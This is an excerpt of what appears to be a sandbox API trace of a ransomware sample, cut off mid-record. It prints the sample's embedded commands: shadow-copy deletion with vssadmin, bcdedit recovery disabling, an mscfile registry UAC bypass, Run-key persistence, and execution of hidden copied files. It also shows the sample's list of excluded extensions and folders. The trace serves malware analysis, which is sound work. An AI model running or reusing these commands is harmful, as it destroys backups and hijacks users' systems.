ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0108.853] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x139c63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0108.853] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0108.853] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0108.853] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0108.853] LockResource (hResData=0x50d72c) returned 0x50d72c [0108.853] FreeResource (hResData=0x50d72c) returned 0 [0108.853] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.853] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.853] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.853] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x13fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.853] FreeResource (hResData=0x50d64c) returned 0 [0108.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x140500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.853] GetCurrentThreadId () returned 0xcc4 [0108.853] GetCurrentThreadId () returned 0xcc4 [0108.853] GetCurrentThreadId () returned 0xcc4 [0108.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x139e688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0108.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x139e688, cbMultiByte=1410, lpWideCharStr=0x13b9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0108.854] GetCurrentThreadId () returned 0xcc4 [0108.854] GetCurrentThreadId () returned 0xcc4 [0108.854] GetCurrentThreadId () returned 0xcc4 [0108.854] GetCurrentThread () returned 0xfffffffe [0108.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0108.854] GetLastError () returned 0x3f0 [0108.854] GetCurrentProcess () returned 0xffffffff [0108.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0108.854] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13b7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13b7ae0, ReturnLength=0x12fc60) returned 1 [0108.854] CloseHandle (hObject=0xb8) returned 1 [0108.854] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.854] EqualSid (pSid1=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13b7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0108.854] EqualSid (pSid1=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13b7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0108.854] EqualSid (pSid1=0x2f6468*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13b7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.855] GetCurrentProcess () returned 0xffffffff [0108.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0108.855] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0108.855] GetLastError () returned 0x7a [0108.855] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2f7708 [0108.855] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2f7708, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2f7708, ReturnLength=0x12fc64) returned 1 [0108.855] GetSidSubAuthorityCount (pSid=0x2f7710*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2f7711 [0108.855] GetSidSubAuthority (pSid=0x2f7710*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2f7718 [0108.855] LocalFree (hMem=0x2f7708) returned 0x0 [0108.855] CloseHandle (hObject=0xb8) returned 1 [0108.855] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0108.855] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0108.856] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0108.857] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.857] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0108.857] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0108.857] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0108.857] LockResource (hResData=0x516824) returned 0x516824 [0108.858] FreeResource (hResData=0x516824) returned 0 [0108.858] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.858] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.858] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.858] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405008, cbMultiByte=38, lpWideCharStr=0x13fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.858] FreeResource (hResData=0x50d64c) returned 0 [0108.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x140500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.858] GetCurrentThreadId () returned 0xcc4 [0108.858] GetCurrentThreadId () returned 0xcc4 [0108.858] GetCurrentThreadId () returned 0xcc4 [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1390128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0108.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1390128, cbMultiByte=615, lpWideCharStr=0x139c65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.858] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] 